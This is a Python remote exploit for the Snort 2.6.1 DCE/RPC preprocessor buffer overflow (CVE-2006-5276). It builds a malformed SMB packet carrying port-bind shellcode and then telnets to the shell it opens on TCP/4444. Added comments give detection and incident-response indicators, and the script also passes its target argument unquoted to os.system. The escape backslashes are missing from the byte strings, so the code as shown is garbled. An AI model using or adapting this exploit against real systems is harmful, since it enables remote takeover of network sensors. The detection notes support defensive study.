
# Title : Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux)
# Published : 2007-03-30
# Author : Winny Thomas


#!/usr/bin/python
#
# Remote exploit for Snort DCE/RPC preprocessor vulnerability as described in
# CVE-2006-5276. The exploit binds a shell to TCP port 4444 and connects to it.
# This code was tested against snort-2.6.1 running on Red Hat Linux 8
#
# Author shall bear no responsibility for any screw ups caused by using this code
# Winny Thomas :-)

import os
import sys
import time
from scapy import *

# Linux portbind shellcode; Binds shell on TCP port 4444
# Embedded verbatim into the second Write AndX request built in ExploitSnort().
# IR note: a successful run leaves a new listening socket on TCP/4444 on the
# compromised host; an unexpected listener there, or an inbound connection to
# it, is the post-exploitation indicator to hunt for.
shellcode  = "x31xdbx53x43x53x6ax02x6ax66x58x99x89xe1xcdx80x96"
shellcode += "x43x52x66x68x11x5cx66x53x89xe1x6ax66x58x50x51x56"
shellcode += "x89xe1xcdx80xb0x66xd1xe3xcdx80x52x52x56x43x89xe1"
shellcode += "xb0x66xcdx80x93x6ax02x59xb0x3fxcdx80x49x79xf9xb0"
shellcode += "x0bx52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x53"
shellcode += "x89xe1xcdx80"

def ExploitSnort(target):
       """Build the malformed SMB request and emit it once toward ``target``.

       The request is hand-assembled: NetBIOS session header, SMB header, then
       Tree Connect AndX, NT Create AndX and two Write AndX requests. The second
       Write AndX carries the overflow data (address, NOP filler, shellcode).
       It is sent as a single raw IP/TCP segment with no TCP handshake, so
       ``target`` only has to be a destination whose traffic the Snort sensor
       inspects -- per the file header, the sensor's DCE/RPC preprocessor is the
       component under attack, not ``target`` itself.

       Args:
           target: destination IPv4 address placed in the IP header.

       Returns:
           None. Side effect: one packet sent via scapy's ``send``.

       Detection note (reviewer): the observable traits are an unsolicited
       PSH/ACK segment to TCP/139 from source port 1025 with no preceding SYN,
       and an SMB Write AndX body holding a long run of identical filler bytes.
       Mitigation is a Snort release in which CVE-2006-5276 is fixed; with the
       DCE/RPC preprocessor disabled the affected parsing path is presumably not
       reached -- confirm against the vendor advisory.
       """
       # SMB packet borrowed from http://www.milw0rm.com/exploits/3391
       # NetBIOS Session Service
       smbreq = "x00x00x02xab"

       # SMB Header
       smbreq += "xffx53x4dx42x75x00x00x00x00x18x07xc8x00x00"
       smbreq += "x00x00x00x00x00x00x00x00x00x00x00x00xffxfe"
       smbreq += "x00x08x30x00"

       # Tree Connect AndX Request
       smbreq += "x04xa2x00x52x00x08x00x01x00x27x00x00"
       smbreq += "x5cx00x5cx00x49x00x4ex00x53x00x2dx00x4bx00x49x00"
       smbreq += "x52x00x41x00x5cx00x49x00x50x00x43x00x24x00x00x00"
       smbreq += "x3fx3fx3fx3fx3fx00"

       # NT Create AndX Request
       smbreq += "x18x2fx00x96x00x00x0ex00x16x00x00x00x00x00x00x00"
       smbreq += "x9fx01x02x00x00x00x00x00x00x00x00x00x00x00x00x00"
       smbreq += "x03x00x00x00x01x00x00x00x40x00x40x00x02x00x00x00"
       smbreq += "x01x11x00x00x5cx00x73x00x72x00x76x00x73x00x76x00"
       smbreq += "x63x00x00x00"

       # Write AndX Request #1
       # The write data begins with what looks like a DCE/RPC header
       # (05 00 0b 03 ...); this is the part the preprocessor parses.
       smbreq += "x0ex2fx00xfex00x00x40x00x00x00x00xffxffxffxffx80"
       smbreq += "x00x48x00x00x00x48x00xb6x00x00x00x00x00x49x00xee"
       smbreq += "x05x00x0bx03x10x00x00x00x10x02x00x00x01x00x00x00"
       smbreq += "xb8x10xb8x10x00x00x00x00x01x00x00x00x00x00x01x00"
       smbreq += "xc8x4fx32x4bx70x16xd3x01x12x78x5ax47xbfx6exe1x88"
       smbreq += "x03x00x00x00x04x5dx88x8axebx1cxc9x11x9fxe8x08x00"
       smbreq += "x2bx10x48x60x02x00x00x00"

       # Write AndX Request #2
       smbreq += "x0exffx00xdexdex00x40x00x00x00x00xffxffxffxffx80"
       smbreq += "x00x48x00x00x00xffx01xcex01x00x00x00x00x49x00xee"
       smbreq += "xedx1ex94x7cx90x81xc4xffxefxffxffx44"
       smbreq += "x31xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xa9"
       # The following address overwrites RET and points into our shellcode
       # NOTE(review): `struct` is never imported by name in this file; it is
       # presumably pulled in by `from scapy import *` -- confirm.
       smbreq += struct.pack('<L', 0xbfffeff0)
       smbreq += 'x90' * 50
       smbreq += shellcode
       smbreq += 'x90' * 130

       # Raw segment: fixed source port, PSH/ACK to the NetBIOS session port,
       # no prior handshake and no reply expected.
       packet = IP(dst=target) / TCP(sport=1025, dport=139, flags="PA") / smbreq
       send(packet)

def ConnectRemoteShell(target):
       """Open an interactive telnet session to ``target`` on TCP port 4444.

       ``target`` is concatenated unquoted into a command line and handed to
       ``os.system``, i.e. to the shell; nothing in this file validates the
       argv value before it gets here. Blocks until the telnet process exits.

       Args:
           target: host address passed through to ``/usr/bin/telnet``.
       """
       connect = '/usr/bin/telnet ' + target + ' 4444'
       os.system(connect)

if __name__ == '__main__':
       # Entry point: exactly one positional argument, the destination address.
       try:
               target = sys.argv[1]
       except IndexError:
               # Python 2 print statement -- this script is Python 2 only.
               print 'Usage: %s <ip of a host on snort network>' % sys.argv[0]
               sys.exit(-1)

       print '[+] Sending malformed SMB packet'
       ExploitSnort(target)
       # Fixed delay; nothing checks whether the packet had any effect before
       # the connection attempt.
       print '[+] Connecting to remote shell in 3 seconds...'
       time.sleep(3)
       ConnectRemoteShell(target)
